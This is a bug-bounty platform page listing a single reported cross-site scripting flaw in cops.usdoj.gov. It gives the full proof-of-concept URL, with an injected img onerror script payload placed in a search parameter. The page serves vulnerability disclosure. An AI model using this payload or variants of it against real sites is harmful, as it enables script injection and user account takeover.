Report Issues, Win Prizes
Report an Issue
Bug Bounties
Signup
Login
Chat with BLT Bot
×
We reply immediately
Send
Clear
Loading...
Usdoj
[
support@usdoj.gov
] Last email bounce 2 months, 3 weeks ago | Clicks 0
Subscribe to Usdoj bugs
Tweet
Page 1 of 1
Open [1]
Closed [0]
open
Security
XSS in cops subdomain of US Department of Justice cops.usd…
XSS in cops subdomain of US Department of Justice cops.usdoj.gov ,capable of User account takeover.
febinrev
found a bug on
Usdoj
3 years, 10 months ago
https://cops.usdoj.gov/RIC/ric.php?page=searchrez&cmd=1&pagenum=0&sort=title-LH&searchtext=fffffff%22--%3E%3Cimg%20src=X%20onerror=alert(%27XSS%27);document.write(%27FEBIN_PWNED%27);%3E
Page 1 of 1
Page 1 of 1
Top Bug Hunters for Usdoj
febinrev
1 bug
v1.5